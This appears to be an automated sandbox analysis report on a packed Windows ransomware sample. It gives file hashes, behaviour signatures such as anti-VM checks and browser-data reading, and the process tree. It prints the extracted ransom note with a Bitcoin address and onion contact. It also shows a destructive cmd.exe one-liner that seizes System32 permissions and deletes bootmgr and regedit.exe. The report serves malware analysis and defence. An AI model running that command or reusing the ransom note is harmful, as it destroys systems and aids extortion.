Analysis

  • max time kernel
    150s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    06-11-2024 13:55

General

  • Target

    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

  • Size

    3.1MB

  • MD5

    6a85d0ba4d1db63d390b7a071d60e0ef

  • SHA1

    79a32ee067e19b43bc3f29fde3a3ff95986f8e2e

  • SHA256

    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412

  • SHA512

    16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce

  • SSDEEP

    49152:uZik4UvxXDFSuvXKWC9BKtKkd1UOe65qeVyODIaihosmrcvCM97Wd84T3D:YGuDppmT+Be6bymIhoBcaY6d84jD

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT

Ransom Note
Ooops! All your important files are encrypted! [+] What happend to my computer? [+] All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $250. [+] How do i pay? [+] Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom. [+] How can i contact? [+] 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us ([email protected]) [+] What if i already paid? [+] Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software. 3.Do not turn off your computer. Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe
URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Renames multiple (202) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Disables Task Manager via registry modification
  • Possible privilege escalation attempt 5 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Modifies file permissions 1 TTPs 5 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
    "C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:576
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1824
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1724
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        PID:2312
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32\drivers /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        PID:2336
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2508

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\HOW-TO-DECRYPT.TXT

    Filesize

    1KB

    MD5

    f2bbb85d6112bd7360a4ddbc23ea9a8b

    SHA1

    683eb7b2b0a5904337f204f71d25c02b9cc5daba

    SHA256

    be548e310dab08ae249c6d20ba64034d4f3568365d4d31e1f1262abb6c3f33f2

    SHA512

    a2bae503e9d18fc9bf1e981d2ec074f389a11e51e385f8701a14bc580c95b6c5f907baf9c7bf55e610d1582951fe7d93121b154fe532df6699389a77fcf6b172

  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.log

    Filesize

    16B

    MD5

    2caa6f3c95f6ec6bba5b54344938efa0

    SHA1

    2d5637f50e858fbaaeec7853d944dd3c3e91ec39

    SHA256

    16ef853f2adc432c54ad75d0db8169be845065f65b6c5136eaafdcbe698ac1e6

    SHA512

    4141715b1d3a28a5fae1e3a1613cca697d07e24808da2b679abc5235d5a181799f35a0ce090ead8dcc133c3b7b7435b9805a3b9bc5eaca4f7167dab7c93d3e00

  • C:\Users\Admin\Desktop\ResetBlock.xlsx

    Filesize

    11KB

    MD5

    7c4ebcaeaef5bc92e69c7cbd04600924

    SHA1

    dda30896a3a1f6ce10ac046f236af1495fb93bc9

    SHA256

    218849cd172e02725162943a6821b04b0315d9272d76af9b4a4b6cb58396187f

    SHA512

    1e8ccc10960b52be94de50c19b4e5f2b60b6676b2a3b5a70d11a8bddfae2d6c396fe38fe6daf061768d8c3a72e58c64e07089ae6531e7522791c872707307291

  • memory/576-8-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-19-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-6-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-18-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-17-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-16-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-15-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-14-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-13-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-12-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-11-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-10-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-9-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-0-0x0000000000B00000-0x0000000001330000-memory.dmp

    Filesize

    8.2MB

  • memory/576-1-0x0000000076401000-0x0000000076402000-memory.dmp

    Filesize

    4KB

  • memory/576-20-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-5-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-4-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-3-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-2-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-27-0x0000000000B00000-0x0000000001330000-memory.dmp

    Filesize

    8.2MB

  • memory/576-26-0x0000000000B00000-0x0000000001330000-memory.dmp

    Filesize

    8.2MB

  • memory/576-28-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-21-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-22-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-260-0x0000000000B00000-0x0000000001330000-memory.dmp

    Filesize

    8.2MB

  • memory/576-303-0x0000000076401000-0x0000000076402000-memory.dmp

    Filesize

    4KB

  • memory/576-304-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-305-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB

  • memory/576-7-0x00000000763F0000-0x0000000076500000-memory.dmp

    Filesize

    1.1MB